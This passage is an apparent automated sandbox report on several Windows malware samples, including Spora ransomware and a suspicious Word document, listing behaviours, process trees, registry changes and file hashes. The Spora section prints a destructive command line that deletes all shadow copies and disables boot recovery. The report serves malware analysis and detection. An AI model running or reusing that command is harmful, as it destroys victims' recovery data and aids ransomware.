Max time network
124s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe
"C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe"
C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe
"C:\Users\Admin\AppData\Local\Temp\Uninstall (2).exe" end
Network
Files
memory/1668-0-0x0000000000400000-0x0000000000423000-memory.dmp
memory/2332-1-0x0000000000400000-0x0000000000423000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20241023-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe"
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.TaskServer.exe"
Network
Files
memory/2848-0-0x000007FEF5543000-0x000007FEF5544000-memory.dmp
memory/2848-1-0x00000000010A0000-0x00000000011BE000-memory.dmp
memory/2848-2-0x0000000000280000-0x00000000002CC000-memory.dmp
memory/2848-15-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
memory/2848-29-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
memory/2644-28-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
memory/2644-30-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
memory/2644-31-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20241010-en
Max time kernel
240s
Max time network
246s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp\:Zone.Identifier:$DATA | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1656 wrote to memory of 2836 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 1656 wrote to memory of 2836 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 1656 wrote to memory of 2836 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 1656 wrote to memory of 2836 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected and EnCrypted.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Network
Files
memory/1656-0-0x000000002FAC1000-0x000000002FAC2000-memory.dmp
memory/1656-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1656-2-0x000000007139D000-0x00000000713A8000-memory.dmp
memory/1656-5-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-13-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-14-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-12-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-11-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-10-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-9-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-8-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-7-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-6-0x0000000000780000-0x0000000000880000-memory.dmp
memory/1656-4-0x0000000000780000-0x0000000000880000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp
| MD5 | fde0acfe142ea73559014871ed7b1b47 |
| SHA1 | 27f2c34bbcb5611af68a0f143c6ee5766eabf121 |
| SHA256 | 0c32e700da9a052196207dfd2796bd4bedcd1117a03699baae68ac2a3b7a609b |
| SHA512 | 9b01194b19072b1bb5e8df3f4fdfb942f9606b7a7c3b080016302419076a50192d42d58f274a18e437c21cfaae39622b83cbb132a332f3de622efa37ba542ba3 |
memory/1656-30-0x000000007139D000-0x00000000713A8000-memory.dmp
memory/1656-31-0x0000000000780000-0x0000000000880000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2644 wrote to memory of 2336 | N/A | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe |
| PID 2644 wrote to memory of 2336 | N/A | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe |
| PID 2644 wrote to memory of 2336 | N/A | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe |
| PID 2644 wrote to memory of 2336 | N/A | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe |
| PID 2644 wrote to memory of 2336 | N/A | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe |
| PID 2644 wrote to memory of 2336 | N/A | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe |
| PID 2644 wrote to memory of 2336 | N/A | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Uninstall.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Uninstall.exe
"C:\Users\Admin\AppData\Local\Temp\Uninstall.exe"
C:\Users\Admin\AppData\Local\Temp\Uninstall.exe
"C:\Users\Admin\AppData\Local\Temp\Uninstall.exe" end
Network
Files
memory/2644-0-0x0000000000400000-0x0000000000423000-memory.dmp
memory/2336-1-0x0000000000400000-0x0000000000423000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
187s
Max time network
132s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\USF50-62RZT-XTATX-HTOOT-ZYYYY.HTML | C:\Users\Admin\AppData\Local\Temp\spora.exe | N/A |
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2796 set thread context of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\spora.exe | C:\Users\Admin\AppData\Local\Temp\spora.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\spora.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\spora.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000078a0cc6b0b830b4fbbc12dd3fac6f54200000000020000000000106600000001000020000000ec75a2286dc7a24ff959658895e1214a1edbec120bff195b14223d649a3b6ebe000000000e80000000020000200000004fb84450943f52f2b667438e3b35e737e30e9f272e3bf201815f107f3677ae5e20000000bef170c7a7203dd52f23b156f767e62891994ac34c193bde396e011c48843580400000002c90e763d69447c3d4838dd6b5662d9134270c8160648f7f769dfbb9c6858d3d382bd063e41c30f107fc971e99141307445118ffb6f65012ac7fcbc06360fdbd | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{68667531-A883-11EF-A5D8-F2DF7204BD4F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438408649" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50b0273d903cdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000078a0cc6b0b830b4fbbc12dd3fac6f542000000000200000000001066000000010000200000005be205dabb56b8b3c5179a1596016013c4af9446123505c6f34a8802f8187e8c000000000e8000000002000020000000402ed1ad6795914312986358fd6117bee19875c52d9de4903c06f0b5ec7475d5900000007678c27a81f9ad8a3be5a943863119494e3123dec45eba84b6fb1b7de647c5103ec9fec51f94b40f85077c127cc2f185405683a8b062ab6238e83fc96161a719019500955b0b826323f3b49dd0c0e8d638eb8118b1c0a51da1e0fd4183e7e4390af48ac1e177ed057716a77e1240e23ce552b44126a20fd1fafd8bdd6e56fc62148b0c51aa962ada0ec7e10e97c888b140000000ddff07d6a2ce7dad5e3364fa1493b44c600b1bda4928394d98bbfe8185c5b95abe431d5da8ccff86ce138f7c8411b5367a2249377ac1806dcae65181ba79a5f8 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\spora.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\spora.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\spora.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\spora.exe
"C:\Users\Admin\AppData\Local\Temp\spora.exe"
C:\Users\Admin\AppData\Local\Temp\spora.exe
C:\Users\Admin\AppData\Local\Temp\spora.exe
C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\USF50-62RZT-XTATX-HTOOT-ZYYYY.HTML
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:692 CREDAT:275457 /prefetch:2
C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/1540-1-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1540-4-0x0000000000400000-0x0000000000784000-memory.dmp
memory/1540-3-0x0000000000400000-0x0000000000784000-memory.dmp
memory/1540-13-0x0000000000400000-0x0000000000784000-memory.dmp
memory/1540-10-0x0000000000400000-0x0000000000784000-memory.dmp
memory/1540-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1540-7-0x0000000000400000-0x0000000000784000-memory.dmp
memory/1540-6-0x0000000000400000-0x0000000000784000-memory.dmp
memory/1540-5-0x0000000000400000-0x0000000000784000-memory.dmp
memory/2796-0-0x00000000002B0000-0x00000000002B5000-memory.dmp
memory/1540-12-0x0000000000400000-0x0000000000784000-memory.dmp
C:\Users\Admin\AppData\Roaming\USF50-62RZT-XTATX-HTOOT-ZYYYY.KEY
| MD5 | 61abff02832b67d275b10e21909146ff |
| SHA1 | 6394ad02c77c02c3168be8c3a0b81d2fb8062898 |
| SHA256 | 3ed7b10a126d8144bb966958d98a23bf727e92138a48456e7381b44c4f77759b |
| SHA512 | 43095a9b0fe2adff81f9c77dc8fbf2c7a4ab28ae1e01a9da2bd0e0cb3c029a3c336ea3543275c288db30ddc64896fc6a133c21a848de3e79b43d88e2fd60e6ff |
F:\USF50-62RZT-XTATX-HTOOT-ZYYYY.HTML
| MD5 | d98f12ec6e0ef7f3117471ba9712a5f1 |
| SHA1 | 1771a2bb43ce9b4421a8b643f5c3036e920853b0 |
| SHA256 | da4343509481acbb5805078da4f397ed35332d95041ca166f77ca8e0d2f21434 |
| SHA512 | cf4c5079d0288f7ad7f7b93d06884a36932b2b80f6955a749eda716596aee2b66c6d8154aa9b02e365e6ce2c047a47ab18c6c468279f2f810a0eafcb25316205 |
F:\USF50-62RZT-XTATX-HTOOT-ZYYYY.LST
| MD5 | f693ab1fdb0feb2d24976b12fb3e3196 |
| SHA1 | eb6a62e6e99c6b6005c45cf6a7f202818d35e5fd |
| SHA256 | c6dfb028f50623f5cdbec757f0c27cf04fef3690db93fabf714b6c573ccf49c2 |
| SHA512 | 2795161e37a9a3479ee1b849c020afab2f12ae2bf8040b1ad7bd9e8069817772b7b918bfca685096a74676ac7ca0ce7a257b04e879406d99f64d5b2404fc3324 |
memory/1540-121-0x0000000000400000-0x0000000000784000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab2A4D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar2ABE.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8481b71d61faa011ac20489911dba498 |
| SHA1 | 53f0925782f0af815a3125a42a109c092fe2e333 |
